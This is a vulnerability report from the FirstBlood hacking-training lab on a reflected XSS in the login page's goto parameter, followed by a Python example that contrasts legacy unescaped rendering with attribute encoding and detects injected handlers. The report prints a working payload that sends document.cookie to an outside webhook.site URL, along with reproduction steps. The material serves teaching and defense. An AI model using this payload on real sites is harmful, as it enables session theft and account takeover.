FirstBlood-#579 — Reflective XSS on /login.php?goto=
This issue was discovered on FirstBlood v2
On 2021-10-26, th4nu0x0 Level 2 reported:
Summary:
Hey, I have found a reflective cross-site scripting on /login.php?goto= which has the potential to steal cookies, which can lead to account takeover of higher-privilege accounts when the user visits the malicious link.
Payload:
- Alerts 1:
"onmouseleave=confirm`1`//
- To Steal Cookies:
"onmouseleave="window.location.href=`https://webhook.site/ff9a5b6d-720c-4e25-8abf-656b645cbe74/${document.cookie}`"//
Steps To Reproduce:
- Visit https://your-instance.a.firstbloodhackers.com/login.php?goto="onmouseleave=confirm`1`//
- Move the mouse pointer down towards "Doctor Login"
Impact:
An attacker can use this vulnerability to inject malicious JavaScript and steal users' cookies.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: "onmouseleave=confirm`1`//
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.
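The following is an added example, not code from the FirstBlood application or from the report. It models the reflection the report describes: the goto value dropped into a double-quoted value attribute of an input tag. The legacy rendering concatenates raw input; the fixed rendering applies attribute-context encoding (the Python equivalent of PHP's htmlspecialchars with ENT_QUOTES). A small parser-level check then shows whether the report's payload created a new on* attribute, which is the property the developers' fix for ID 39 should have guaranteed on every code path that reflects goto. The exact tag, the function names and the module layout are assumptions.

```python
"""Added example (not FirstBlood code): reflected XSS in an attribute context,
legacy (unescaped) rendering beside the fixed one, plus a check that detects
attribute break-out the way a tolerant HTML parser sees it."""
import html
from html.parser import HTMLParser

# Payload quoted from the report, unchanged.
PAYLOAD = '"onmouseleave=confirm`1`//'


def render_goto_legacy(goto: str) -> str:
    """Assumed legacy behaviour: goto is concatenated straight into the
    value attribute with no output encoding."""
    return f'<input name="goto" value="{goto}">'


def render_goto_fixed(goto: str) -> str:
    """Contextual encoding for a double-quoted attribute. quote=True is the
    part that matters here: it turns " into &quot;, so the value can no
    longer terminate the attribute (PHP: htmlspecialchars($goto, ENT_QUOTES, 'UTF-8'))."""
    return f'<input name="goto" value="{html.escape(goto, quote=True)}">'


class _InputAttrCollector(HTMLParser):
    """Collects the attribute map of the first <input> tag seen."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self.attrs:
            self.attrs = dict(attrs)


def input_attributes(markup: str) -> dict:
    """Parse the rendered tag with a tolerant parser (mirroring how a browser
    recovers from a quote closing early) and return the input's attributes."""
    parser = _InputAttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_handlers(markup: str) -> list:
    """Any on* attribute that appears is one the template never wrote, i.e.
    the user-controlled value escaped the attribute context."""
    return sorted(k for k in input_attributes(markup) if k.startswith("on"))


if __name__ == "__main__":
    for label, render in (("legacy", render_goto_legacy), ("fixed", render_goto_fixed)):
        out = render(PAYLOAD)
        print(f"{label}: {out}")
        print(f"  input attributes : {input_attributes(out)}")
        print(f"  injected handlers: {injected_handlers(out)}")
```

With the report's payload, the legacy rendering yields `value=""` followed by a bare `onmouseleave=confirm`1`//"` attribute; the trailing `//` turns the stray quote into a JavaScript comment, which is why the payload needs no closing quote of its own. The fixed rendering keeps the whole string inside the value attribute and the parser sees no on* attribute at all. Because the developer note says the bug survived in a legacy copy of the code, the check above is worth running against every endpoint that reflects goto, not only the one where the fix for ID 39 landed.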